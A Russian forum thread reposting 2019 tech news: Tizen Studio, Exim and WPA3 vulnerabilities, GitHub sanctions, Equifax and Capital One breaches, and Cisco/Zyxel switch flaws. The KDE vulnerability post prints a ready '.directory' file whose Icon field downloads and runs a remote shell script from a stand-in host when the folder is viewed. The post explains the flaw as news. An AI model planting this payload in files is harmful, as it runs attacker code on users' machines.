Доступен выпуск среды разработки Tizen Studio 3.3, пришедшей на смену Tizen SDK и предоставляющей набор инструментов для создания, сборки, отладки и профилирования мобильных приложений при помощи Web API и Native API Tizen. Среда построена на базе свежего выпуска платформы Eclipse, имеет модульную архитектуру и на этапе установки или через специальный пакетный менеджер позволяет устанавливать только необходимую функциональность.

В состав Tizen Studio входит набор эмуляторов устройств на базе Tizen (эмулятор смартфона, телевизора, умных часов), набор примеров для обучения, инструменты для разработки приложений на C/С++ и с использованием web-технологий, компоненты для обеспечения поддержки новых платформ, системных приложений и драйверов, утилиты для сборки приложений к Tizen RT (вариант Tizen на базе RTOS-ядра), средства для создания приложений для умных часов и телевизоров.

В новой версии:

Запуск приложения в режиме эмуляции теперь автоматически приводит к запуску эмулятора, если он находится к неактивном сосотоянии;
Для web-приложений добавлен элемент launch_screen;
Решены проблемы с излишним выводом запросов пароля автора и поставщика при запуске проекта с сертификатом платформы;
В разделе Device Manager налажено отображение лога устройств.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 25 июл 2019, 15:41

Узбекистан разработал проект финансирования развития интернета

Министерство по развитию информационных технологий и коммуникаций Республики Узбекистан (РУ) разработало проект постановления Кабинета министров РУ, согласно которому для реализации инвестиционных проектов по модернизации и развитию телекоммуникационной инфраструктуры АК "Узбектелеком" предполагается привлечь средства кредита Государственного банка развития Китая, сообщает портал Spot. Документ размещен для публичного обсуждения, сроки обсуждения - с 25 июля по 8 августа 2019 года.

Целью предлагаемых мер заявлено обеспечение благоприятных условий для активного внедрения современных технологий передачи данных, развития оптоволоконный сетей для широкополосного доступа и модернизации сетей мобильной связи.

Согласно проекту, предполагается "определить источниками финансирования инвестиционных проектов по модернизации и развитию телекоммуникационной инфраструктуры АК "Узбектелеком" кредитные средства ГБРК в размере $40 млн, предоставляемые сроком на 5 лет, в том числе льготный период 1,5 года с процентной ставкой шестимесячный либор плюс 4,2% годовых, включая маржу Национального банка ВЭД Республики Узбекистан в размере 1% годовых".

Инициатива затрагивает, в том числе проекты "Развитие сетей телекоммуникаций с перспективой внедрения технологии 5G", "Расширение центра хранения и обработки данных" и "Внедрение беспроводных технологий по подключению широкополосным доступом к сети Интернет".

Напомним, в середине июля 2019 года сообщалось, что Узбекистан поднялся на 8 позиций в мировом рейтинге скорости интернета.

В начале июля появлялась информация, что Мининфком Узбекистана начал принимать предложения по развертыванию сетей 5G.

В июне оператор связи "Узбектелеком" рассказал о планах вывести скорость интернета на уровень стран СНГ к 2020 году.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 26 июл 2019, 20:15

Обновление Exim 4.92.1 с устранением уязвимости
26.07.2019 06:19


Опубликован внеплановый выпуск почтового сервера Exim 4.92.1 в котором устранена критическая уязвимость (CVE-2019-13917), позволяющая организовать удалённое выполнение кода с правами root при наличии в конфигурации определённых специфичных настроек.

Уязвимость проявляется начиная с выпуска 4.85 при использовании в настройках оператора "${sort }", в случае если используемые в списке "sort" элементы могут быть переданы атакующим (например, через переменные $local_part и $domain). По умолчанию данный оператор не применяется в конфигурации, предлагаемой в базовой поставке Exim и в пакете для Debian и Ubuntu (вероятно и в других дистрибутивах). Для проверки своей системы на наличие уязвимости можно выполнить команду "exim -bP config | grep sort".

Обновления пакетов с устранением уязвимости уже выпущены для Debian и Ubuntu. Обновления пока не подготовлены для SUSE, Fedora, FreeBSD и Arch Linux. RHEL и CentOS проблеме не подвержены, так как Exim не входит в их штатный репозиторий пакетов (при необходимости ставится из репозитория epel).
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 26 июл 2019, 20:19

Выпуск wayland-protocols 1.18
26.07.2019 05:52


Опубликован релиз пакета wayland-protocols 1.18, содержащего набор протоколов и расширений, дополняющих возможности базового протокола Wayland и предоставляющих возможности, необходимые для построения композитных серверов и пользовательских окружений. В версии 1.18 внесены незначительные дополнения в существующие протоколы, улучшена документация и устранены выявленные ошибки. Выпуск Weston 7.0 и Wayland 1.18 ожидается 23 августа.

В настоящее время в состав wayland-protocols входят следующие стабильные протоколы, в которых обеспечивается обратная совместимость:

"viewporter" - позволяет клиенту выполнять действия по масштабированию и обрезанию краёв поверхности на стороне сервера.
"presentation time" - обеспечивает отображение видео.
"xdg-shell" - интерфейс создания и взаимодействия с поверхностями как с окнами, что позволяет их передвигать по экрану, сворачивать, разворачивать, изменять размер и т.д.

Нестабильные протоколы, разработка которых ещё не завершена и не гарантируется сохранение совместимости с прошлыми выпусками:

"fullscreen-shell" - управление работой в полноэкранном режиме;
"input-method" - обработка методов ввода;
"idle-inhibit" - блокировка запуска скринсейвера (экранной заставки);
"input-timestamps" - временные метки для событий ввода;
"linux-dmabuf" - совместное использование нескольких видеокарт при помощи технологии DMABuff;
"text-input" - организация ввода текста;
"pointer-gestures" - управление с сенсорных экранов;
"relative pointer events" - относительные события указателей;
"pointer constraints" - ограничения указателей (блокировка);
"tablet" - поддержка ввода с планшетов.
"xdg-foreign" - интерфейс взаимодействия с поверхностями "соседнего" клиента;
"xdg-decoration" - отрисовка декораций окон на стороне сервера;
"xdg-output" - дополнительные сведения о видеовыходе (используется для дробного масштабирования);
"xwayland-keyboard-grub" - захват ввода в приложениях XWayland.
primary-selection - по аналогии с X11 обеспечивает работу первичного буфера обмена (primary selection), вставка информации из которого обычно осуществляется средней кнопкой мыши;
linux-explicit-synchronization - специфичный для Linux механизм синхронизации буферов в привязке к поверхности.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 27 июл 2019, 12:27

GitHub начал ограничивать пользователей с территорий, подпадающих под санкции США
27.07.2019 07:40


GitHub опубликовал новую редакцию правил, определяющих политику в отношении соблюдения законодательства США в области регулирования экспорта. Правила регламентируют ограничения в отношении приватных репозиториев и корпоративных учётных записей компаний, работающих на территориях, подпадающих под санкции (Крым, Иран, Куба, Сирия, Судан, Северная Корея), но до сих пор они не применялись в отношении индивидуальных разработчиков некоммерческих проектов.

Новая редакция правил содержит пояснение, указывающее на возможность ограничения работы публичных сервисов для индивидуальных пользователей, находящихся на санкционных территориях. Для данных пользователей предписывается использование платформы только для персональных коммуникаций. Кроме изменения правил, GitHub также начал на практике ограничивать доступ к своим сервисам некоммерческих пользователей из санкционных стран.

Например, под ограничение попала учётная запись Анатолия Кашкина, проживающего в Крыму автора проекта GameHub, у которого был заблокирован сайт tkashkin.tk, размещённый через сервис GitHub Pagеs, и был введён запрет на создание бесплатных приватных репозиториев, а существующие приватные репозитории были заблокированы. Возможность создания публичных репозиториев была оставлена. Для снятия ограничений было предложено предоставить доказательство, что пользователь не проживает в Крыму, но Кашкин является гражданином РФ, проживающим и зарегистрированным в Крыму, поэтому отправка апелляции невозможна.

Похожие ограничения также были применены ко многим индивидуальным иранским разработчикам, у которых также были заблокированы бесплатные приватные репозитории и закрыты страницы в GitHub Pagеs. Сервисы были заблокированы без предварительного предупреждения и без предоставления возможности сделать резервную копию (в том числе служба поддержки отказывается предоставить актуальные данные из заблокированных сервисов). При этом доступ к публичным репозиториям пока всем предоставляется без изменений.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 31 июл 2019, 19:45

Америка запретит соцсетям «удерживать» юзеров более 30 минут в день
31 Июл, 2019


Американский сенатор Джош Хоули представил законопроект, призванный избавить пользователей от интернет-зависимости. В частности документ прописывает лимит по времени на использование соцсетей, сообщает TechToday.

Правительство США уверено, что социальные сети в попытке максимально долго удерживать внимание пользователей для показа рекламы, формируют у людей интернет-зависимость.

Законопроект The Social Media Addiction Reduction Technology Act устанавливает для пользователей соцсетей временной лимит в 30 минут в день. По желанию юзеры могут его увеличить. А вот интернет-компании, не согласные с этим требованием, будут оштрафованы.

Также в обязанности ресурсов будет входить информирование юзеров о количестве проведенных на сайте минут каждые полчаса. Кроме «бесконечной ленты» соцсети также будут вынуждены отказаться от поощрения пользователей за время, проведенное в сети (виртуальные награды, значки и т.д.).

Напомним, с похожей проблемой сейчас борются власти Китая — правительство обеспокоено зависимостью детей от видеоплатформ вроде TikTok, Kwai и Huoshan. Сервисы коротких видео обязали высылать юзерам предупреждения после 90 минут активного пользования и полностью блокировать доступ спустя два часа просмотра.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 03 авг 2019, 20:37

Компенсации жертвам утечки Equifax не хватит на всех пострадавших

Жертвы утечки данных, допущенной бюро кредитных историй Equifax, рискуют остаться без финансовых компенсаций. Инцидент, произошедший в 2017 году, считается одной из крупнейших утечек персональных данных в истории США: он затронул порядка 147 миллионов человек. Похищенными, в частности, оказались номера водительских прав, полисов социального страхования и банковских карт. Федеральная торговая комиссия США (FTC) обязала Equifax выплатить 700 миллионов долларов для урегулирования претензий. Программа компенсаций предусматривает, в числе прочего, возможность для каждого затронутого утечкой гражданина получить либо сумму в 125 долларов, либо бесплатную услугу кредитного мониторинга сроком на 10 лет.

Но спрос на финансовую компенсацию явно оказался слишком велик. Накануне FTC обратилась к гражданам, затронутым утечкой, с призывом сделать выбор в пользу кредитного мониторинга. В публикации на сайте Комиссии поясняется, что названная общая сумма в 700 миллионов долларов включает в себя компенсации американцам, с чьих банковских счетов вследствие утечки были похищены средства, а также штрафы и выплаты в пользу различных государственных учреждений. Непосредственно же на компенсацию «по факту утечки» приходится лишь 31 миллион долларов. Вполне очевидно, что если все 147 миллионов пострадавших захотят получить именно деньги, то на каждого в результате придется вовсе не 125 долларов, а существенно меньшая сумма - если быть точными, то примерно 20 центов.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

За это сообщение пользователю студент "Спасибо" сказали
mr.distryanov

Re: Новости интернета

Сообщение студент » 04 авг 2019, 19:32

GitHub включён в число ответчиков в деле об утечке пользовательской базы Capital One
04.08.2019 12:06


Юридическая компания Tycko & Zavareei подала судебный иск, связанный с утечкой персональных данных более 100 миллионов клиентов банковского холдинга Capital One, включая сведения об около 140 тысячах номеров социального страхования и 80 тысячах номеров банковских счетов. Помимо Capital One в число ответчиков включена компания GitHub, которой вменяется предоставление возможности размещения, отображения и использования информации, полученной в результате взлома.

По мнению истца, GitHub обязан соблюдать действующее в США законодательство, запрещающее размещение в открытом доступе номеров социального страхования пользователей. В частности, так как номера социального страхования имеют фиксированный формат, компания должна была предусмотреть наличие фильтров для выявления фактов размещения пользователями результатов утечек и их блокировки, не дожидаясь официальных уведомлений.

Представители GitHub заявили, что сведения истца не соответствуют действительности и на GitHub не размещались полученные в результате утечки персональные данные. В одном из репозиториев лишь были помещены инструкции по получению данных, которые фактически оставались в БД, размещённой в облачном сервисе Amazon S3. Из-за ненадлежащей настройки межстевого экрана, ограничивающего доступ к web-приложениям, имелась возможность обращения к хранилищу в Amazon S3. По первому же уведомлению от Capital One размещённые инструкции были удалены из GitHub.

В рамках разбирательства также арестована Пейдж Томсон (Paige Thompson), бывшая сотрудница Amazon, которая в марте обнаружила наличие проблемы и в апреле разместила на GitHub информацию по получению доступа. Детали с описанием проблемы оставались на GitHub с 21 апреля по середину июля. Capital One в иске вменяется ненадлежащая организация мониторинга несанкционированного доступа, что привело к тому, что утечка оставалась незамеченной около трёх месяцев.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 04 авг 2019, 20:04

Суд в США освободил Маркуса Хатчинса

Федеральный окружной суд США в штате Висконсин вынес приговор 25-летнему британцу Маркусу Хатчинсу. Хатчинс, известный среди специалистов по кибербезопасности под ником MalwareTech, прославился в 2017 году, когда ему удалось остановить стремительное распространение опаснейшего зловреда WannaCry, поразившего множество компьютеров более чем в 70 странах мира. Именно Маркус Хатчинс обнаружил в коде вредоносного ПО несуществующее доменное имя, регистрация которого и привела к прекращению эпидемии.

Летом того же года Хатчинс принимал участие в конференции по кибербезопасности DEF CON в США. После ее завершения он был арестован агентами ФБР в аэропорту Лас-Вегаса. Власти Соединенных Штатов предъявили ему обвинения в создании и распространении банковского троянца Kronos. Изначально исследователь отрицал свою вину, но, как выяснилось, Хатчинс уже давно находился в разработке у ФБР, и в руках следствия имелись логи его переписки, в которых сам он признавался в причастности к созданию Kronos. В результате Маркус Хатчинс признал себя виновным по 2 из 10 пунктов предъявленных обвинений.

Исследователю грозило тюремное заключение сроком до 10 лет, но судья Джозеф Стадтмюллер вынес существенно более мягкий приговор. В своем вердикте он отметил, что Хатчинс участвовал в создании и распространении вредоносного ПО еще в подростковом возрасте, когда мог не вполне осознавать последствия своих поступков. Также судья подчеркнул важность того обстоятельства, что со временем Хатчинс сам кардинально пересмотрел свое поведение и стал специалистом по кибербезопасности. Наконец, Стадтмюллер указал, что польза от последних действий Хатчинса – в частности, его вклад в борьбу с WannaCry – существенно перевешивают причиненный им ранее ущерб. В результате суд приговорил британца к сроку тюремного заключения, равному времени, которое он провел под стражей в ожидании приговора – это автоматически означает освобождение в зале суда. Маркусу Хатчинсу также предстоит провести год под надзором, однако он не будет ограничен в передвижениях, включая и выезд за пределы США. Предполагается, что Хатчинс в ближайшие дни вернется на родину, в Великобританию. В своем Twitter он написал, что благодарен судье за «снисхождение и понимание», а также всем, кто поддерживал его в последние два года.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

Re: Новости интернета

Сообщение студент » 04 авг 2019, 20:24

Новые уязвимости в технологии защиты беспроводных сетей WPA3 и в EAP-pwd
04.08.2019 09:29


Мэти Ванхофом (Mathy Vanhoef) и Эяль Ронен (Eyal Ronen) выявили новый метод атаки (CVE-2019-13377) на беспроводные сети, использующие технологию защиты WPA3, позволяющий получить сведения о характеристиках пароля, которые можно использовать для проведения его подбора в offline-режиме. Проблема проявляется в актуальной версии Hostapd.

Напомним, что в апреле теми же авторами были выявлены шесть уязвимостей в WPA3, для противодействия которым объединение Wi-Fi Alliance, развивающее стандарты для беспроводных сетей, внесло изменения в рекомендации по обеспечению безопасных реализаций WPA3, в которых было предписано использовать защищённые эллиптические кривые Brainpool, вместо ранее допустимых эллиптических кривых P-521 и P-256.

Тем не менее, анализ показал, что использование Brainpool приводит к возникновению нового класса утечек по сторонним каналам в применяемом в WPA3 алгоритме согласования соединений Dragonfly, предоставляющем защиту от подбора паролей в offline-режиме. Выявленная проблема демонстрирует, что создание реализаций Dragonfly и WPA3, избавленных от утечек данных по сторонним каналам, является чрезвычайно сложной задачей, а также показывает несостоятельность модели развития стандартов за закрытыми дверями без проведения общедоступного обсуждения предлагаемых методов и аудита сообществом.

При использовании эллиптической кривой Brainpool при кодировании пароля алгоритмом Dragonfly выполняется несколько предварительных итераций с паролем, связанных с быстрым вычислением короткого хэша до начала применения эллиптической кривой. До нахождения короткого хэша выполняемые операции напрямую зависят от пароля и MAC-адреса клиента. Время выполнения (коррелирует с числом итераций) и задержки между операциями в ходе выполнения предварительных итераций могут быть измерены и использованы для определения характеристик пароля, которые можно использовать в offline для уточнения правильности выбора частей пароля в процессе его подбора. Для проведения атаки необходимо наличие доступа к системе пользователя, подключающегося к беспроводной сети.

Дополнительно, исследователями выявлена вторая уязвимость (CVE-2019-13456), связанная с утечкой информации в реализации протокола EAP-pwd, использующего алгоритм Dragonfly. Проблема специфична для RADIUS-сервера FreeRADIUS и на основании утечки сведений по сторонним каналам также как и первая уязвимость позволяет существенно упростить подбор пароля.

В сочетании с улучшенным методом отсеивания шумов в процессе измерения задержек для определения числа итераций достаточно провести 75 измерений для одного MAC-адреса. При использовании GPU затраты на ресурсы для подбора одного словарного пароля оцениваются в $1. Методы по повышению безопасности протоколов, позволяющие блокировать выявленные проблемы, уже внесены в черновые варианты будущих стандартов Wi-Fi (WPA 3.1) и EAP-pwd. К сожалению, без нарушения обратной совместимости в текущих версиях протоколов устранить утечки по сторонним каналам не получится.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

За это сообщение пользователю студент "Спасибо" сказали
mr.distryanov

Re: Новости интернета

Сообщение студент » 07 авг 2019, 20:27

Опрос: более 70% граждан Турции выступают за контроль интернет-вещания

Согласно данным исследования предпочтений зрителей 2018 года, 70,4% опрошенных граждан Турции высказались за контроль интернет-вещания, сообщает ИА Regnum. Об этом рассказал глава Верховного совета по радио и телевещанию Эбубекир Шахин.

В то же время, против отслеживания платформ, которые вещают через интернет, высказались 13% опрошенных. Также Шахин отметил, что в рамках исследования право голоса было предоставлено в том числе и тем, кто является субъектом интернет-вещания. Среди респондентов этой группы 65,9% выступили за установление контроля, а 29,5% - против.

"Во многих странах мира публикуемая в рамках интернет-вещания информация контролируется, а ее субъекты — подлежат лицензированию. Наша страна, по показателю демократичности подхода к регулированию интернет-вещания, оставила далеко позади множество европейских стран", - добавил Эбубекир Шахин.

Пока в Турции только начинают делать шаги в сторону контроля над интернет-вещанием, тем временем в России Роскомнадзор предлагает усилить контроль на сетях операторов кабельного ТВ. Целью изменений заявлено повышение эффективности осуществления государственного надзора за соблюдением законодательства Российской Федерации в сфере средств массовой информации и массовых коммуникаций, телевизионного вещания и радиовещания.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

За это сообщение пользователю студент "Спасибо" сказали
mr.distryanov

Re: Новости интернета

Сообщение студент » 07 авг 2019, 20:34

Уязвимость в KDE, позволяющая выполнить код при просмотре списка файлов
07.08.2019 12:25


В KDE выявлена уязвимость, позволяющая атакующему выполнить произвольные команды при просмотре пользователем каталога или архива, содержащего специально оформленные файлы ".desktop" и ".directory". Для атаки достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере Dolphin, загрузил вредоносный desktop-файл или перетащил мышью ярлык на рабочий стол или в документ. Проблема проявляется в актуальном выпуске библиотек KDE Frameworks 5.60.0 и более старых версиях, вплоть до KDE 4. Уязвимость пока остаётся неисправленной (CVE не присвоен).

Проблема вызвана некорректной реализацией класса KDesktopFile, который при обработке переменной "Icon" без должного экранирования передаёт значение в функцию KConfigPrivate::expandString(), которая выполняет раскрытие спецсимволов shell, в том числе обрабатывая строки "$(..)" как подлежащие исполнению команды. Вопреки требованиям спецификации XDG выполнение раскрытия shell-конструкций производится без разделения типа настроек, т.е. не только при определении командной строки запускаемого приложения, но и при указании отображаемых по умолчанию пиктограмм.

Например, для атаки достаточно отправить пользователю zip-архив с каталогом, содержащим файл ".directory" вида:

[Desktop Entry]
Type=Directory
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

При попытке просмотра содержимого архива в файловом менеджере Dolphin будет загружен и выполнен скрипт https://example.com/FILENAME.sh.

Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

За это сообщение пользователю студент "Спасибо" сказали
mr.distryanov

Re: Новости интернета

Сообщение студент » 08 авг 2019, 20:30

Уязвимости, позволяющие захватить управление коммутаторами Cisco, Zyxel и NETGEAR на чипах RTL83xx
08.08.2019 10:09


В коммутаторах на базе чипов RTL83xx, включая Cisco Small Business 220, Zyxel GS1900-24, NETGEAR GS75x, ALLNET ALL-SG8208M и ещё более десятка устройств от менее известных производителей, выявлены критические уязвимости, позволяющие неаутентифицированному атакующему получить контроль над коммутатором. Проблемы вызваны ошибками в SDK Realtek Managed Switch Controller, код из которого использовался при подготовке прошивок.

Первая уязвимость (CVE-2019-1913) затрагивает управляющий web-интерфейс и даёт возможность выполнить свой код с привилегиями пользователя root. Уязвимость вызвана недостаточной проверкой передаваемых пользователем параметров и отсутствием должной оценки границ буфера при чтении входных данных. В результате, атакующий может вызвать переполнение буфера через отправку специально оформленного запроса и эксплуатировать проблему для выполнения своего кода.

Вторая уязвимость (CVE-2019-1912) позволяет без аутентификации загрузить произвольные файлы на коммутатор, в том числе перезаписать файлы с конфигурацией и организовать запуск обратного shell для удалённого входа. Проблема вызвана неполной проверкой полномочий в web-интерфейсе.

Также можно отметить устранение менее опасной уязвимости (CVE-2019-1914), которая позволяет при наличии непривилегированного аутентифицированного входа в web-интерфейс выполнить произвольные команды с привилегиями root. Проблемы устранены в обновлениях прошивок Cisco Small Business 220 (1.1.4.4), Zyxel и NETGEAR. Детальное описание методов эксплуатации планируется опубликовать 20 августа.

Проблемы также проявляются в других устройствах на чипах RTL83xx, но они пока не подтверждены производителями и не исправлены:

EnGenius EGS2110P, EWS1200-28TFP, EWS1200-28TFP;
PLANET GS-4210-8P2S, GS-4210-24T2;
DrayTek VigorSwitch P1100;
CERIO CS-2424G-24P;
Xhome DownLoop-G24M;
Abaniact (INABA) AML2-PS16-17GP L2;
Araknis Networks (SnapAV) AN-310-SW-16-POE;
EDIMAX GS-5424PLC, GS-5424PLC;
Open Mesh OMS24;
Pakedgedevice SX-8P;
TG-NET P3026M-24POE.
Аватара пользователя

студент
Администратор
Администратор
 
Сообщения: 13415
Зарегистрирован: 14 авг 2016, 17:08
Points: 14823790.00
Bank: 0 Points
Медали: 2
Администратор (1) Друзья (1)
Cпасибо сказано: 6822
Спасибо получено: 6978 раз в 4994 сообщениях
Баллы репутации: 4862

За это сообщение пользователю студент "Спасибо" сказали
mr.distryanov

Пред.След.

Вернуться в Новости интернета

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1

В обязанности Администрации не входит контроль легальности или нелегальности передаваемой информации (любой, включая, но не ограничиваясь, информацией передаваемой между пользователями, внутренней пересылки информации в виде различных ссылок, текстов или архивов), определение прав собственности или законности передачи, приема или использования этой информации. Администрация не несёт никакой ответственности за пользователей данного форума!